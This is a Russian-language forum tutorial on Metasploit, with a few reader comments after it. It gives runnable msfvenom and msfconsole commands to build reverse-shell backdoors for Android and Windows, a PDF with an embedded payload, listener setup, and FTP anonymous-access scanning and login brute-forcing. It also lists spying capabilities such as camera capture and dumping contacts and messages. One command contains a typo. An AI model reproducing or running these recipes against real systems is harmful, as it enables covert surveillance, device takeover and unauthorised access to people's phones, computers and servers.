Статья Metasploit. Учимся вместе полезным фишкам.

prw.jpg

Введение

Рад приветствовать дорогих читателей! Я практически уверен, что все, кто читает данную статью, как минимум слышали про такой замечательный фреймворк как Metasploit. Данный фреймворк хранит в себе довольно богатую базу данных различных уязвимостей на любой вкус и цвет, которые только возможно проэксплуатировать. В этой статье хочу познакомить вас с некоторыми полезными и даже можно выразиться базовыми уязвимостями, которые здорово помогут вам в изучении сферы информационной безопасности и естественно в саморазвитии.

Дисклеймер: Все данные, предоставленные в данной статье, взяты из открытых источников, не призывают к действию и являются только лишь данными для ознакомления, и изучения механизмов используемых технологий.

Практическая часть

Итак, конечно же все действия будут проводиться на моей любимой Kali Linux, тем более там этот фреймворк уже предустановлен, поэтому если что, можно сразу к командам приступать и не париться.

Бэкдор на андроид

Здесь мы будем генерировать полезную нагрузку на андроид устройствах, делается всё довольно просто.

Мы вписываем вот такую команду для генерации:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.9 lport= 4444 R> Test.apk

Что же означает данная команда? Давайте разберём!
  • Часть строки, где написано android, указывает на операционную систему, под которую генерируется полезная нагрузка;
  • meterpreter/reverse_tcp означает то, что подключаться к хосту данный бэкдор будет по протоколу tcp;
  • lhost = 192.168.0.9 означает IP хоста, к которому будет подключаться бэкдор. Так как в рамках тестирования и ознакомления всё будет проходить в локальной сети, я ввёл свой локальный IP адрес. Для того, чтобы можно было подключиться из глобальной сети к вам, соответственно, нужен будет глобальный ваш IP адрес и при реверс инжиниринге бэкдора, его будет довольно легко выявить;
  • lport = 4444 это собственно порт, по которому бэкдор будет обращаться к нам;
  • И как не сложно догадаться, в строчке R > Test.apk задаётся название нашей полезной нагрузке.
После того как она сгенерировалась, у вас в каталоге появиться ваш apk файл. Теперь я закидываю бэкдор на тестовое устройство android, но перед тем как его закинуть, нужно подготовиться к ловле сессии в нашем фреймворке. Для этого нам нужно будет его запустить вот этой командой msfconsole.

После того как мы его запустили, нам нужно выбрать нашу полезную нагрузку, а для этого вписываем последовательно следующие команды:

use exploit/multi/handler

в данной команде мы выбираем эксплоит удалённого доступа

set payload android/meterpreter/reverse_tcp

здесь мы выбираем платформу и способ подключения

set lhost 192.168.0.9

задаём наш хост

set lport 4444

задаём порт

exploit

ну и собственно запускаем

1676302650481.png


Ну теперь я устанавливаю и открываю файл полезной нагрузки, и на экране моментально получаю сессию к моему устройству. Спектр возможностей удалённого доступа здесь весьма обширный. Можно сделать фотку через любую из камер телефона, лазить по директориям и скачивать какие-либо файлы, делать полный дамп номеров в телефонной книге, сообщений и звонков, узнать местоположение и многое многое другое.

Бэкдор на Windows.

Ну здесь всё происходит впринципе аналогичным образом, нужно будет поменять лишь несколько строчек.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.9 lport= 4444 R> Test2.exe

Команда так же весьма проста и понятна, поэтому переходим сразу к нашему фреймворку. Запускаем его msfconsole.

Ну и далее так же по очереди запускаем следующие команды

Код:
use exploit/mulit/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.9

set lport 4444

exploit

1676302664533.png


Далее аналогичным образом проверяем всё это дело на Windows по средством запуска и сессия готова.

Эксплоит в PDF

Так же для фреймворка не составит труда сгенерировать PDF файл с полезной нагрузкой и аналогичным образом подключиться к нему. Давайте же приступим!

Здесь уже msfvenom нам не понадобиться, будем всё делать прямиком в метасплоите, поэтому снова его запускаем msfconsole.

Далее прописываем вот такие команды:

Код:
use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs

Здесь будет задействован эксполит, который будет встроен в PDF файл

Код:
set lhost 192.168.0.9

set lport 4444

set filename Test3.pdf

Здесь задаём имя нашему файлу

Код:
exploit

1676302691690.png


Ну и далее генерируется полезная нагрузка в виде файла PDF. Подключиться можно будет так же через multi/handler. То есть просто не выходя из консоли прописываем:

Код:
use exploit/multi/handler

set lhost 192.168.0.9

set lport 4444

exploit

Ну и ждём сессии.

Вход по ftp

Так же наш фреймворк может спокойно просканировать диапазон IP адресов на возможность подключения к какому-либо с помощью ftp через логин Anonymous

Для этого мы запускаем наш фреймворк msfconsole.

И вводим следующие команды:

Код:
use auxiliary/scanner/ftp/anonymous
Выбираем наш сканер

Код:
set RHOSTS 192.168.1.200-254
Выбираем диапазон адресов для сканирования

Код:
set THREADS 55
run

Ну и собственно далее на экране у нас будут адреса на которых есть ftp и к которым можно подключиться через логин Anonymous без пароля и легко получить доступ.

1676302705781.png


Таким же образом можно и подбирать логин с паролем к диапазону адресов, для этого вводим следующие команды:

Код:
set RHOSTS 192.168.69.50-254
set THREADS 205
set USERNAME msfadmin
set PASSWORD msfadmin
set VERBOSE false
run

1676302718311.png


Ну и далее мы увидим адреса на которых есть ftp и к которым можно подключиться используя заданные вами логин и пароль для подбора.

Заключение

Сегодня поведал вам немного о такой волшебной и удивительной штуке как Metasploit Framework. И у него весьма широкий спектр применений, через него можно выполнять практически все ключевые задачи в тестировании чего-либо на уязвимость, но опять же повторюсь, что данная статья не побуждает к злонамеренным действиям и несёт лишь ознакомительный характер.
 
Последнее редактирование:

piok

Member
03.03.2023
5
0
Добрый день, я так скажем начинающий ИБ, которому нравится вся эта движуха:)
Подскажите пожалуйста, я уже пользовался msfvenom и такой вопрос.
Для чего использовать ключ (флаг) R > если существует ключ(флаг) -o которая позволяет также полезную нагрузку пихать в создаваемый файл? Можете пожалуйста немного рассказать в чём разница данных флагов?
Спасибо.
 

B13

Green Team
01.01.2020
249
37
Добрый день, я так скажем начинающий ИБ, которому нравится вся эта движуха:)
Подскажите пожалуйста, я уже пользовался msfvenom и такой вопрос.
Для чего использовать ключ (флаг) R > если существует ключ(флаг) -o которая позволяет также полезную нагрузку пихать в создаваемый файл? Можете пожалуйста немного рассказать в чём разница данных флагов?
Спасибо.
man msfvenom пробовали команду?
 

piok

Member
03.03.2023
5
0
man msfvenom пробовали команду?
Добрый день, спасибо за ответ. Да, выводит описание использования утилиты и описание флагов. Посмотрел внимательно, там нет описание на счет флага "R". Если смотреть на Example, то там пример использования утилиты с флагом "-o". Что на счет стрелки ">", то это я как понимаю выходной поток выполненной команды в файл. По типу ">>". Если не ошибаюсь конечно.
Спасибо.
С уважением, Евгений.
 

bigboss3000

New member
18.03.2018
2
0
Замени use exploit/mulit/handler на use exploit/multi/handler и не позорься, а так статья норм
 
Мы в соцсетях: